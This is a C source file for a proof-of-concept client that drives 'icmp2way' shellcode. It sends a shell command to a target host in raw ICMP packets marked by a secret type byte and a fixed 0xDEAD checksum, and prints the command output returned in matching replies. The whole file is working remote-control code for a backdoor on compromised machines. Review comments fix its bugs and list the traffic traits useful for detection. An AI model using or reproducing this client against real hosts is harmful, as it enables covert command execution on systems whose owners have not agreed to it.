/*
-------------------------------------------------------
Simple proof of concept client for icmp2way.c shellcode
by gloomy@netric.org
-------------------------------------------------------
http://www.netric.org/tools/icmp_client.c
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip_icmp.h>
/*
 * Print the expected command line and an example invocation to stderr,
 * then terminate the process. Never returns. The exit status is 0 even
 * though this is reached on bad arguments.
 */
void usage(char *prog) {
    FILE *out = stderr;

    fprintf(out, "Usage: %s <secret byte> <hostname> <command>\n", prog);
    fprintf(out, "Example: %s 0x99 localhost \"/usr/bin/id\"\n\n", prog);
    exit(0);
}
/*
 * Report a failed library/system call and terminate. `err` is the prefix
 * handed to perror(), which appends the text for the current errno.
 * Never returns; the process exits with status -1.
 */
void error(char *err) {
    const int failure_status = -1;

    perror(err);
    exit(failure_status);
}
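/*
 * Send one ICMP datagram carrying <command> to <hostname> over a raw socket
 * and print matching replies to stderr.
 *
 * Arguments: v[1] = secret byte (hex, 0x01..0xFF), v[2] = target host,
 * v[3] = command string (at most CMD_MAX bytes are sent; longer input is
 * silently truncated, as in the original).
 *
 * Wire format, as built below: the ICMP type field holds the secret byte,
 * code is 0, the checksum field is the fixed constant 0xDEAD (not computed),
 * and the command string starts DATA_PAD bytes after the ICMP header.
 * For anyone writing detection: a constant, normally invalid ICMP checksum,
 * an operator-chosen type value, and printable command text in the payload
 * are the observable traits of this traffic.
 *
 * Requires the privilege to open a raw socket. Returns 0 once the receive
 * window ends; exits via usage()/error() on failure.
 */
int main(int c,char *v[]) {
    enum {
        CMD_MAX = 1024,   /* maximum command bytes copied into the packet */
        DATA_PAD = 8,     /* gap between ICMP header and command, kept from the original;
                             presumably what the receiving side expects - confirm */
        IP_HDR_LEN = 20   /* assumes replies carry no IP options (IHL == 5) */
    };
    int fd;
    int ready;
    ssize_t nb;
    socklen_t sa_size;
    fd_set rfds;
    unsigned long parsed;
    unsigned char secret;
    char *end;
    char buf[4096];
    char *data = &buf[sizeof(struct icmphdr) + DATA_PAD];
    struct timeval tv;
    struct sockaddr_in them;
    struct icmphdr *hdr = (struct icmphdr *)buf;
    struct hostent *host;

    if (c != 4) usage(v[0]);

    /* Parse into a wide type first: the original assigned strtoul() straight
     * into a char, so out-of-range values wrapped silently and argv was
     * overwritten with the end pointer. */
    parsed = strtoul(v[1], &end, 16);
    if (end == v[1] || *end != '\0' || parsed == 0 || parsed > 0xFF) usage(v[0]);
    secret = (unsigned char)parsed;

    /* gethostbyname() reports failure through h_errno, not errno, so perror()
     * would print an unrelated message here. */
    host = gethostbyname(v[2]);
    if (host == NULL || host->h_addrtype != AF_INET ||
        host->h_length != (int)sizeof(them.sin_addr) ||
        host->h_addr_list[0] == NULL) {
        fprintf(stderr, "gethostbyname: cannot resolve %s to an IPv4 address\n", v[2]);
        exit(-1);
    }

    if ((fd = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP)) < 0) error("socket");

    memset(&them, 0, sizeof(them));
    them.sin_family = AF_INET;
    them.sin_port = 0;
    /* memcpy avoids dereferencing the resolver buffer through a cast pointer */
    memcpy(&them.sin_addr, host->h_addr_list[0], sizeof(them.sin_addr));

    memset(buf, 0, sizeof(buf));
    hdr->type = secret;
    hdr->code = 0;
    hdr->checksum = 0xDEAD;
    hdr->un.gateway = 0;
    /* Bounded copy that always NUL-terminates on its own instead of relying
     * on the preceding memset, as the original strncpy() did. */
    snprintf(data, CMD_MAX + 1, "%s", v[3]);

    if (sendto(fd, buf, sizeof(struct icmphdr) + DATA_PAD + strlen(data) + 1, 0,
               (struct sockaddr *)&them, sizeof(them)) < 0)
        error("sendto");

    /* tv is set once: on Linux select() updates it to the time remaining, so
     * the 2 seconds bound the whole receive loop there. Other systems may
     * leave tv untouched, making it a per-wait timeout. */
    tv.tv_sec = 2;
    tv.tv_usec = 0;
    for (;;) {
        FD_ZERO(&rfds);
        FD_SET(fd, &rfds);
        ready = select(fd + 1, &rfds, NULL, NULL, &tv);
        /* The original treated -1 as "readable" and fell into recvfrom(). */
        if (ready < 0) error("select");
        if (ready == 0) break;

        sa_size = sizeof(them);   /* value-result argument: reset before every call */
        /* Leave one byte free so the terminator below stays inside buf; the
         * original read 4096 bytes and then wrote buf[4096]. */
        nb = recvfrom(fd, buf, sizeof(buf) - 1, 0, (struct sockaddr *)&them, &sa_size);
        if (nb < 0) error("recvfrom");
        buf[nb] = 0;

        /* A raw ICMP socket sees every ICMP datagram delivered to this host.
         * Only inspect the type byte if it was actually received, and compare
         * as unsigned bytes so the result does not depend on char signedness
         * (assumes the reply type is secret+1 modulo 256 - confirm).
         * NOTE(review): the sender address is not compared with the target and
         * the payload is printed verbatim, so any host can inject text
         * (including terminal control bytes) into this output. */
        if (nb > IP_HDR_LEN &&
            (unsigned char)buf[IP_HDR_LEN] == (unsigned char)(secret + 1)) {
            fprintf(stderr, "%s\n", &buf[IP_HDR_LEN + 1]);
        }
    }

    close(fd);
    return 0;
}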